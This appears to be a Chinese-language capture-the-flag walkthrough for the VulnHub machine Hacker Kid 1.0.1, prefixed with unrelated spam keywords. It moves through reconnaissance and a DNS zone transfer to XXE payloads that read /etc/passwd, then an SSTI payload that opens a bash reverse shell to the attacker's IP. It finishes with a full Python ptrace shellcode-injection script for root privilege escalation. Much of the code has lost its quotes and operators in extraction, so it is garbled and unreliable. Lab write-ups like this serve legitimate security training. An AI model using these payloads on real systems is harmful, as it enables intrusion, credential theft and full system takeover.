深圳建设造价信息网站,免费下载简历自己填写,建个企业营销型网站,作文网址文章目录 HACKER KID: 1.0.1实战演练一、前期准备1、相关信息 二、信息收集1、端口扫描2、访问网站3、扫描目录4、查看源码5、请求参数6、burpsuite批量请求7、编辑hosts文件8、DNS区域传输9、编辑hosts10、访问网站11、注册账号12、burpsuite抓包13、XML注入14、解密15、登录网… 文章目录 HACKER KID: 1.0.1实战演练一、前期准备1、相关信息 二、信息收集1、端口扫描2、访问网站3、扫描目录4、查看源码5、请求参数6、burpsuite批量请求7、编辑hosts文件8、DNS区域传输9、编辑hosts10、访问网站11、注册账号12、burpsuite抓包13、XML注入14、解密15、登录网站的9999端口16、提交参数17、监听 三、提权1、查找具有Capabilities特殊操作权限的程序2、创建源码文件3、开机本地开启http服务4、下载脚本5、查看以root运行的进程6、执行脚本7、查看端口是否开放8、连接端口 HACKER KID: 1.0.1实战演练
一、前期准备
1、相关信息
靶机网站https://www.vulnhub.com/entry/hacker-kid-101,719/
设备名称IP地址攻击机kali192.168.0.109靶机Hacker kid: 1.0.1192.168.0.103
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.0.103//开放DNS:53端口、WEB:80端口、9999端口
//DNS:53端口版本号ISC BIND 9.16.1
//WEB:80端口中间件为Apache-httpd 2.4.41
//MySQL:3306端口版本号为Tornado httpd 6.12、访问网站
http://192.168.0.103/翻译为
你给我起了一个“臭名昭著的黑客”的名字就因为我黑了你的整个服务器。
现在我可以访问你的整个服务器了。如果你足够聪明可以取回它就给我看看。
“你越挖我你就会在你的服务器上找到我。挖我…挖我更多”http://192.168.0.103/index.html//无法访问返回404http://192.168.0.103/#app.html//发现出现一个#符号页面没有变化http://192.168.0.103/app.html//功能没法使用http://192.168.0.103/#form.html//发现出现一个#符号页面没有变化http://192.168.0.103/form.html3、扫描目录
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.0.103 4、查看源码
view-source:http://192.168.0.103/index.php//使用GET提交page_no请求新的页面5、请求参数
http://192.168.0.103/index.php?page_no1//有回显批量测试6、burpsuite批量请求 //原文为
Okay so you want me to speak something ?
I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!
Out of my many homes...one such home..one such home for me : hackers.blackhat.local
//翻译为
好吧你想让我说点什么
我是一个黑客孩子而不是一个愚蠢的黑客。所以我创建了一些子域以便随时返回服务器
在我的许多家里。。。一个这样的家。。对我来说就是这样一个家hackers.blackhat.local7、编辑hosts文件
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts //添加192.168.0.103 hackers.blackhat.local8、DNS区域传输
┌──(kali㉿kali)-[~]
└─$ dig axfr 192.168.0.103 blackhat.local9、编辑hosts
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts 10、访问网站
http://hackerkid.blackhat.local///发现一个注册界面11、注册账号
//提示邮箱错误12、burpsuite抓包
//发现是XML传输数据的13、XML注入
?xml version1.0 encodingUTF-8?
!DOCTYPE foo [!ENTITY xxe SYSTEM file:///etc/passwd]
rootnamekali/nametel13911111111/telemailxxe;/emailpassword123456/password
/root?xml version1.0 encodingUTF-8?
!DOCTYPE foo [!ENTITY xxe SYSTEM php://filter/convert.base64-encode/resource/home/saket/.bashrc ]
rootnamekali/nametel13911111111/telemailxxe;/emailpassword123456/password
/root14、解密
//账号admin
//密码Saket!#$%!!15、登录网站的9999端口
http://192.168.0.103:9999/login?next%2F//账号saket密码Saket!#$%!!
//原文为
Tell me your name buddy
How can i get to know who are you ??
//翻译为
告诉我你的名字伙计
我怎么才能知道你是谁 16、提交参数
//编码前
{% import os %}{{os.system(bash -c bash -i /dev/tcp/192.168.0.109/4444 01)}}
//编码后
%7B%25%20import%20os%20%25%7D%7B%7Bos.system(bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.109%2F4444%200%3E%261%22)%7D%7D17、监听
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444 三、提权
1、查找具有Capabilities特殊操作权限的程序
saketubuntu:~$ /usr/sbin/getcap -r / 2/dev/null 2、创建源码文件
# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c import ctypes
import sys
import struct# Macros defined in sys/ptrace.h
# https://code.woboq.org/qt5/include/sys/ptrace.h.htmlPTRACE_POKETEXT 4
PTRACE_GETREGS 12
PTRACE_SETREGS 13
PTRACE_ATTACH 16
PTRACE_DETACH 17# Structure defined in sys/user.h
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_structclass user_regs_struct(ctypes.Structure):_fields_ [(r15, ctypes.c_ulonglong),(r14, ctypes.c_ulonglong),(r13, ctypes.c_ulonglong),(r12, ctypes.c_ulonglong),(rbp, ctypes.c_ulonglong),(rbx, ctypes.c_ulonglong),(r11, ctypes.c_ulonglong),(r10, ctypes.c_ulonglong),(r9, ctypes.c_ulonglong),(r8, ctypes.c_ulonglong),(rax, ctypes.c_ulonglong),(rcx, ctypes.c_ulonglong),(rdx, ctypes.c_ulonglong),(rsi, ctypes.c_ulonglong),(rdi, ctypes.c_ulonglong),(orig_rax, ctypes.c_ulonglong),(rip, ctypes.c_ulonglong),(cs, ctypes.c_ulonglong),(eflags, ctypes.c_ulonglong),(rsp, ctypes.c_ulonglong),(ss, ctypes.c_ulonglong),(fs_base, ctypes.c_ulonglong),(gs_base, ctypes.c_ulonglong),(ds, ctypes.c_ulonglong),(es, ctypes.c_ulonglong),(fs, ctypes.c_ulonglong),(gs, ctypes.c_ulonglong),]libc ctypes.CDLL(libc.so.6)pidint(sys.argv[1])# Define argument type and respone type.
libc.ptrace.argtypes [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype ctypes.c_uint64# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registersuser_regs_struct()# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))print(Instruction Pointer: hex(registers.rip))print(Injecting Shellcode at: hex(registers.rip))# Shell code copied from exploit db.
shellcode\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):# Convert the byte to little endian.shellcode_byte_intint(shellcode[i:4i].encode(hex),16)shellcode_byte_little_endianstruct.pack(I, shellcode_byte_int).rstrip(\x00).encode(hex)shellcode_byteint(shellcode_byte_little_endian,16)# Inject the byte.libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.ripi),shellcode_byte)print(Shellcode Injected!!)# Modify the instuction pointer
registers.ripregisters.rip2# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))print(Final Instruction Pointer: hex(registers.rip))# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)3、开机本地开启http服务
┌──(kali㉿kali)-[~]
└─$ python -m http.server 80804、下载脚本
saketubuntu:~$ wget http://192.168.0.109:8080/inject.py5、查看以root运行的进程
saketubuntu:~$ ps -aef | grep root6、执行脚本
saketubuntu:~$ python2.7 inject.py 6707、查看端口是否开放
saketubuntu:~$ netstat -ano | grep 5600//如果端口没打开可以重新选择进程号8、连接端口
┌──(kali㉿kali)-[~]
└─$ nc 192.168.0.103 5600
